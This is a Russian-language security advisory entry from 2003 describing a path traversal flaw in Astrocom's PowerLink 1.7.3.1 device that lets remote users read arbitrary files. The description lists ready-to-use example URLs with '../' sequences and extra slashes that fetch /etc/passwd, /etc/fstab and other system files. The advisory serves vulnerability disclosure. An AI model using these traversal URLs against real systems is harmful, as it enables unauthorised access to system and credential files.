Раскрытие файлов удаленным пользователям в Astrocom's PowerLink
| Дата публикации: | 13.05.2003 |
| Всего просмотров: | 912 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость раскрытия информации обнаружена в Astrocom's PowerLink high availability device. Удаленный пользователь может просматривать файлы на системе.
Удаленный пользователь может представить специально обработанный URL, содержащий абсолютный или относительный путь, чтобы просматривать произвольные файлы на системе с привилегиями web демона. Пример: http://somepowerlinkWAN.router/../../../../../../../../../../etc/passwd http://somepowerlinkWAN.router///etc/passwd http://somepowerlinkWAN.router /etc/passwd http://somepowerlinkWAN.router/bin/ http://somepowerlinkWAN.router/dev/ http://somepowerlinkWAN.router/tmp/ http://somepowerlinkWAN.router/etc/fstab http ://somepowerlinkWAN.router/etc/mtabУязвимость обнаружена в PowerLink 1.7.3.1 |
| Ссылки: | =?UTF-8?Q?PowerLink=E2=84=A2_WAN_Aggregator_-_Vune?= |